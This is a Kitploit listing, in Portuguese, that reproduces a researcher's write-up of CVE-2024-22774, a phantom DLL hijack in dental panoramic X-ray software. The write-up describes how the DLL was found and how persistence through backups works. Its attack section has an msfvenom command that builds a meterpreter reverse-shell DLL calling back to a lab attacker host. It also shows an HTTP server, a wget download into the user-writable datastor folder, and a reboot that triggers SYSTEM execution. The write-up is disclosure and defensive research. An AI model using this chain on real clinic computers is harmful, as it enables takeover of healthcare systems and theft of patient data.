Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2024-22774 — Vulnerabilidade de escalada de privilégio furtiva em software de imagem panorâmica dentária | Kitploit
Ferramentas/GitHubGitHub/gray-0men/cve-2024-22774
Escalada de PrivilégiosGeração de PayloadsMecanismos de PersistênciaAnálise de VulnerabilidadesExploraçãoAnálise de MalwareTestes de PenetraçãoRed TeamingExploração de Binários
GitHubgray-0men/cve-2024-22774

CVE-2024-22774

Vulnerabilidade de escalada de privilégio furtiva em software de imagem panorâmica dentária

1há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar
Ver Repositório

Software de Imagem Dentária Panorâmica 9.1.2.7600. Escalação de Privilégio via Phantom DLL Hijack (CVE-2024-22774)

Índice

  • Índice
  • Introdução
  • Versão Final do Software
  • Procurando por DLL Hijackable
  • Configurando o ataque
  • Exploit
  • Persistência após instalação do SO

Introdução

Originalmente, este seria um artigo sobre DLL proxying em algum software de máquina de raio-X dentário, mas me deparei com uma DLL em minha pesquisa que me fez verificar novamente, encontrando, por fim, uma vulnerabilidade de escalação de privilégio que me rendeu um CVE. No início da minha carreira em tecnologia, eu trabalhava com suporte técnico para um fabricante de máquinas de raio-X dentário antes de fechar. Lembro-me dos bugs que surgiam enquanto trabalhava lá e sempre pensei que seria uma boa ideia tentar encontrar vulnerabilidades nesse software. Então, vendo que o software ainda está em uso hoje, decidi ver se poderia fazer algo legal com ele agora que não estou mais no jogo de suporte de software. Lembro-me de algum tempo atrás, no início dos meus estudos em segurança cibernética, havia algumas DLLs interessantes e sequestráveis naquele software, decidi tentar o DLL proxying para ver se conseguia executar uma DLL maliciosa mantendo o software funcional (realmente furtivo). Aqui está o processo que segui e como acidentalmente descobri uma vulnerabilidade de escalação de privilégio que pode (teoricamente) sobreviver a uma limpeza total e reinstalação do SO. Espero que esta informação seja útil para os Blue Teamers.

Versão Final do Software

Uma coisa a notar é que este software não está mais recebendo atualizações, mas sei que as máquinas de raio-X ainda estão em uso nos EUA hoje, então ainda há algum risco potencial para esta vulnerabilidade. Pode ser baixado aqui junto com o manual do software aqui. Outra coisa a notar é SE este software está em uso, há 99% de chance de que os processos que executam e os seguintes locais estejam na lista de permissões em qualquer ERD/AV em uso, isso também é mencionado na página 24 do manual do software. Neste artigo, vou fazer o mesmo e adicionar essas exclusões para corresponder a como este software seria instalado em todos os consultórios odontológicos.

  1. C:\Program Files (x86)\Panoramic
  2. C:\ProgramData\Ajat

image

Procurando por DLL Hijackable

Após o software ser instalado e as exclusões adicionadas, iniciamos o Process Monitor e começamos a pesquisar. Adicione os seguintes filtros e reinicie o "CCS Service" nos Serviços:

  1. Process Name is ccsservice.exe then Include
  2. Path ends with .dll then Include

Uma vez que isso preenche, você notará que há um monte de DLLs sequestráveis neste software. Você verá numerosos resultados "NAME NOT FOUND" com um "SUCCESS" para a mesma DLL, apenas em um local diferente logo em seguida. Eu estava rolando um dia procurando por uma decente para tentar fazer proxy, e quase no final algo chamou minha atenção...

image

Será que é?? É SIM. Esta é uma DLL fantasma sendo invocada com integridade de SYSTEM a partir de um local gravável pelo usuário. Essencialmente, esta é uma DLL que não seria boa para proxy, pois não há DLL real localizada em algum lugar na máquina, então o Windows tentará invocá-la a partir de um conjunto predefinido de pastas em uma ordem específica.

  1. O diretório do qual o aplicativo foi carregado
  2. O diretório do sistema
  3. O diretório do sistema de 16 bits
  4. O diretório do Windows
  5. O diretório atual
  6. Os diretórios listados na variável de ambiente PATH

E no nosso cenário, o 5º local é C:\ProgramData\Ajat\panoramic\datastor\lnrdlib.dll e neste local todos os Usuários têm permissões de leitura, gravação e execução. Para completar, este local é uma subpasta de C:\ProgramData\Ajat\ que deve estar na lista de permissões em todos os ambientes onde isso está em uso.

image

Configurando o ataque

Aqui está a configuração de rede para este teste:

  • Kali - 10.0.1.137
  • Windows 10 64x - 10.0.1.128

Vamos começar criando uma simples DLL meterpreter vanilla, já que não precisamos nos preocupar com AV, e então iniciar um servidor http para transferi-la.

root@kitploit:~
## msfvenom to make dll
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.1.137 LPORT=443 -f dll > lnrdlib.dll

## python http server
python3 -m http.server 80

De volta ao Windows, vamos mudar para nossa conta de usuário padrão, abrir o powershell e navegar até a pasta datastor e executar o seguinte: wget http://10.0.1.137/lnrdlib.dll -outfile lnrdlib.dll

image

Exploit

Se tudo foi feito corretamente, tudo o que precisamos fazer para acionar o exploit é reiniciar o computador (já que isso é algo que um usuário normal pode fazer, reiniciar o CCS Service também acionará isso).

image

SUCESSO!!!

Persistência após instalação do SO

Agora, uma das principais coisas sobre o local datastor é que é um dos dois locais que devem ser copiados caso o computador precise ser limpo ou substituído por qualquer motivo e o software reinstalado. Se o conteúdo da pasta calib for perdido, um técnico precisará ir ao local e recalibrar a máquina de raio-X para recuperá-los. Se os arquivos datastor forem perdidos, você perde as imagens de raio-X mais recentes que ainda não foram salvas, então este local é um tanto opcional para backup. Este local é onde o malware residirá, então é teoricamente possível que alguém reinfecte acidentalmente um computador com o malware se restaurar o conteúdo de um datastor com backup, que continha o malware e todas aquelas imagens de raio-X recentes tiradas, no novo computador. Isso é mencionado na página dois do manual do software.

image

Baixar ferramenta